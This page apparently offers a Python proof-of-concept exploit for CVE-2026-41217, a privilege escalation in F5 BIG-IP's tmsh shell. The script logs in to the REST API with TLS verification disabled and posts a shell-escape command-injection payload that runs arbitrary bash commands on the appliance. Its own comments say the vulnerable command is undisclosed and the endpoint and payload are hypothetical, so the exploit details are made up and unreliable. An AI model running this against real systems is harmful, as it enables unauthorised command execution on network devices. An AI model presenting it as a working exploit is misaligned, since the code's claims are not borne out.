CVE-2026-41217 F5 BIG-IP TMOS Shell权限提升漏洞

#!/usr/bin/env python3 # PoC for CVE-2026-41217: F5 BIG-IP tmsh Privilege Escalation # This script is for educational purposes only. # Requires: Admin/Resource Admin credentials import requests import urllib3 urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) def exploit(target, username, password, command): session = requests.Session() session.verify = False login_url = f"https://{target}/mgmt/shared/authn/login" # 1. Authenticate to BIG-IP auth_payload = { "username": username, "password": password, "loginProviderName": "tmos" } try: resp = session.post(login_url, json=auth_payload) if resp.status_code != 200: print("[!] Login failed") return token = resp.json().get('token', {}).get('token') except Exception as e: print(f"[!] Error during login: {e}") return # 2. Send malicious tmsh command via REST API or utilize the CLI vulnerability # Note: The specific vulnerable tmsh command is undisclosed. # This example simulates the structure of a command injection in tmsh. headers = { "X-F5-Auth-Token": token, "Content-Type": "application/json" } # Hypothetical endpoint to execute tmsh commands # The payload injects a shell escape to run the command payload = { "command": f"vuln_tmosh_cmd '{{ | run /util bash -c \"{command}\" }}'" } exploit_url = f"https://{target}/mgmt/tm/util/bash" print(f"[*] Executing command: {command}") try: # In a real scenario, the endpoint and payload structure depend on the undisclosed command resp = session.post(exploit_url, json=payload, headers=headers) if resp.status_code == 200: print("[+] Command execution likely successful.") print(resp.text) else: print(f"[!] Exploit failed with status {resp.status_code}") except Exception as e: print(f"[!] Error during exploit: {e}") if __name__ == "__main__": # Replace with actual target details exploit("192.168.1.1", "admin", "admin", "id")